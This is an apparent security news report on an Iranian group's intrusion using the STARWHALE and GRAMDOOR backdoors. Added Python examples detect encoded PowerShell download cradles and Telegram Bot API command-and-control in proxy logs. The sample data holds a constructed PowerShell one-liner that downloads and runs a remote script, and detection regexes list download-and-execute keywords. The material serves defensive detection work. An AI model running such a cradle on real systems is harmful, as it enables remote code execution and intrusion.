Iranian Hackers Using New Spying Malware That Abuses Telegram Messenger API (Security News, February 2022)

An Iranian geopolitical nexus threat actor has been uncovered deploying two new targeted malware families with "simple" backdoor functionality as part of an intrusion against an unnamed Middle East government entity in November 2021.
The attacks are said to have been orchestrated via spear-phishing messages to gain initial access, followed by taking advantage of publicly available offensive security tools and remote access software for lateral movement and maintaining access to the environment.
"UNC3313 moved rapidly to establish remote access by using ScreenConnect to infiltrate systems within an hour of initial compromise," the researchers noted, adding the security incident was quickly contained and remediated.
Subsequent phases of the attack involved escalating privileges, carrying out internal reconnaissance on the targeted network, and running obfuscated PowerShell commands to download additional tools and payloads on remote systems.
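The article does not say which obfuscation the operators used, so the following is an added example (not code from the article or from the researchers) of one triage step a responder would run over process telemetry: decode `-EncodedCommand` one-liners, which are the most common way PowerShell download cradles are hidden, and flag the ones that fetch and run remote code. The command lines and the `198.51.100.10` address are constructed for the example and are not indicators from the reported intrusion.

```python
import base64
import re
from typing import List, NamedTuple, Optional

# powershell.exe accepts -EncodedCommand and any unambiguous prefix of it (-e, -ec, -enc);
# the argument is base64 of the script text encoded as UTF-16LE.
ENC_FLAG_RE = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")

# Strings that make a one-liner a download cradle: fetch something remote, then run it.
CRADLE_RE = re.compile(
    r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|FromBase64String|Start-BitsTransfer"
)


def encode_for_powershell(script: str) -> str:
    """Produce the -EncodedCommand form of a script (used here only to build sample data)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Malformed base64 or not UTF-16LE: not a valid encoded command, leave it for manual review.
        return None


class Triage(NamedTuple):
    cmdline: str
    decoded: Optional[str]
    download_cradle: bool


def triage(cmdlines: List[str]) -> List[Triage]:
    """Decode each command line where possible and flag download-and-execute patterns."""
    results = []
    for cmdline in cmdlines:
        decoded = decode_encoded_command(cmdline)
        # Inspect the decoded script when there is one, otherwise the raw command line,
        # so plain (unencoded) cradles are caught as well.
        text = decoded if decoded is not None else cmdline
        results.append(Triage(cmdline, decoded, CRADLE_RE.search(text) is not None))
    return results


# Constructed process command lines (not from the reported intrusion); 198.51.100.10 is a
# documentation address, not a real staging server.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage2.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -enc " + encode_for_powershell("Get-Date"),
]

if __name__ == "__main__":
    for t in triage(SAMPLE_CMDLINES):
        print("cradle=%-5s decoded=%r" % (t.download_cradle, t.decoded))
```

The decoded text, not the raw command line, is what should be matched and retained in the case notes: the base64 blob defeats naive string matching, and the same cradle re-encoded with a different leading comment produces a different blob. In production the command lines would come from Sysmon event 1 or the EDR's process-creation feed rather than a list literal.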
Also observed was a previously undocumented backdoor called STARWHALE, a Windows Script File that executes commands received from a hardcoded command-and-control server via HTTP. Another implant delivered during the course of the attack is GRAMDOOR, so named owing to its use of the Telegram API for its network communications with the attacker-controlled server in a bid to evade detection, once again highlighting the use of legitimate communication tools to facilitate command-and-control and the exfiltration of data.
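Telegram-based C2 is hard to spot by destination alone, because api.telegram.org is a legitimate, high-reputation host, but the Bot API's URL shape gives it away: every call is `https://api.telegram.org/bot<bot_id>:<secret>/<method>`, and an implant needs a polling method (getUpdates) to receive tasks and a send method (sendMessage, sendDocument) to return results. The following Python is an added example, not code from the article or from the researchers, showing how a defender could surface that pattern in web proxy logs. The log format and the client addresses, bot ids and tokens are constructed for the example; nothing here is an indicator from the GRAMDOOR intrusion.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional

# Telegram Bot API calls always take the form
#   https://api.telegram.org/bot<bot_id>:<secret>/<method>
# so the path reveals that a host is driving a bot, which bot, and what it is doing.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)

# Methods an implant needs: polling for operator tasks, and pushing results or files back.
POLL_METHODS = {"getUpdates"}
UPLOAD_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}

# Constructed proxy log lines in a simplified Squid-like layout
# (timestamp client_ip http_method url status). Not real telemetry; the tokens are fake.
SAMPLE_LOG = """\
1644000000.123 10.0.0.15 POST https://api.telegram.org/bot5123456789:AAFakeTokenForExampleOnly-xyz/sendMessage 200
1644000001.456 10.0.0.15 GET https://api.telegram.org/bot5123456789:AAFakeTokenForExampleOnly-xyz/getUpdates?offset=12 200
1644000002.789 10.0.0.22 GET https://www.example.com/index.html 200
1644000003.000 10.0.0.31 POST https://api.telegram.org/bot9876543210:BBAnotherFakeTokenExample/sendDocument 200
1644000004.000 10.0.0.15 GET https://api.telegram.org/bot5123456789:AAFakeTokenForExampleOnly-xyz/getUpdates?offset=13 200
"""


class Finding(NamedTuple):
    client_ip: str
    bot_id: str
    method: str


def parse_line(line: str) -> Optional[Finding]:
    """Return a Finding for a Bot API request, or None for any other line."""
    fields = line.split()
    if len(fields) < 5:
        return None
    _ts, client_ip, _http_method, url, _status = fields[:5]
    m = TELEGRAM_BOT_RE.search(url)
    if m is None:
        return None
    # Keep the bot id (needed to correlate sessions across hosts) but not the secret:
    # the full token belongs in the case file, not in an alert that many people will read.
    return Finding(client_ip, m.group("bot_id"), m.group("method"))


def find_telegram_bot_traffic(log_text: str) -> List[Finding]:
    return [f for f in (parse_line(line) for line in log_text.splitlines()) if f is not None]


def summarize(findings: List[Finding]) -> Dict[str, dict]:
    """Group hits per client and mark the ones that behave like a tasking loop."""
    summary: Dict[str, dict] = defaultdict(
        lambda: {"bot_ids": set(), "polls": 0, "uploads": 0, "total": 0}
    )
    for f in findings:
        s = summary[f.client_ip]
        s["bot_ids"].add(f.bot_id)
        s["total"] += 1
        if f.method in POLL_METHODS:
            s["polls"] += 1
        elif f.method in UPLOAD_METHODS:
            s["uploads"] += 1
    for s in summary.values():
        # A workstation that both polls a bot and uploads to it is acting as an implant;
        # a user's browser never talks to the Bot API at all.
        s["c2_like"] = s["polls"] > 0 and s["uploads"] > 0
    return dict(summary)


if __name__ == "__main__":
    for ip, s in summarize(find_telegram_bot_traffic(SAMPLE_LOG)).items():
        print(ip, sorted(s["bot_ids"]),
              "polls=%d uploads=%d c2_like=%s" % (s["polls"], s["uploads"], s["c2_like"]))
```

The path-level match only works where the proxy sees the full URL, which for HTTPS means TLS inspection. Without it the proxy logs only the CONNECT destination, and the detection degrades to "an endpoint that has no business using Telegram is talking to api.telegram.org", which is still worth alerting on in an environment where Telegram is not a sanctioned tool. Note also that any upload method is reportable on its own: a single sendDocument call from a server is exfiltration regardless of whether polling was observed.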
The findings also coincide with a new joint advisory from cybersecurity agencies from the U.K. and the U.S., accusing the MuddyWater group of espionage attacks targeting the defense, local government, oil and natural gas and telecommunications sectors across the globe.
News URL
https://thehackernews.com/2022/02/iranian-hackers-using-new-spying.html